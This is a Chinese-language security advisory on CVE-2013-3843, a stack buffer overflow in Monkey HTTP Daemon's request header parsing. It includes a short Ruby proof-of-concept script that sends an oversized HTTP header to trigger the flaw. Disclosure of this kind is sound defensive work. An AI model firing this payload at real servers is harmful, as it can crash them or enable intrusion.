安全研究

安全漏洞
Monkey HTTP Daemon 'memcpy()'函数缓冲区溢出漏洞

发布日期:2013-06-04
更新日期:2013-06-07

受影响系统:
Monkey Monkey HTTP Daemon 1.x
描述:
BUGTRAQ  ID: 60333
CVE(CAN) ID: CVE-2013-3843

Monkey HTTP Daemon是适用于GNU/Linux的轻量级Web服务器。

Monkey HTTP Daemon 1.2.0及其他版本在解析请求时, "mk_request_header_process()"函数(src/mk_request.c)中存在栈缓冲区溢出漏洞。

<*来源:Doug Prostko
  
  链接:http://secunia.com/advisories/53697/
        http://bugs.monkey-project.com/ticket/182
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

#!/usr/bin/env ruby

     require "socket"

     host = "localhost"
     port = 2001

     s = TCPSocket.open(host, port)

     buf = "GET / HTTP/1.1\r\n"
     buf << "Host: " + "\r\n"
     buf << "localhost\r\n"
     buf << "Bad: "
     buf << "A" * 2511
     buf << "B" * 4

      s.puts(buf)

建议:
厂商补丁:

Monkey
------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://monkey-project.com/

浏览次数:3830
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障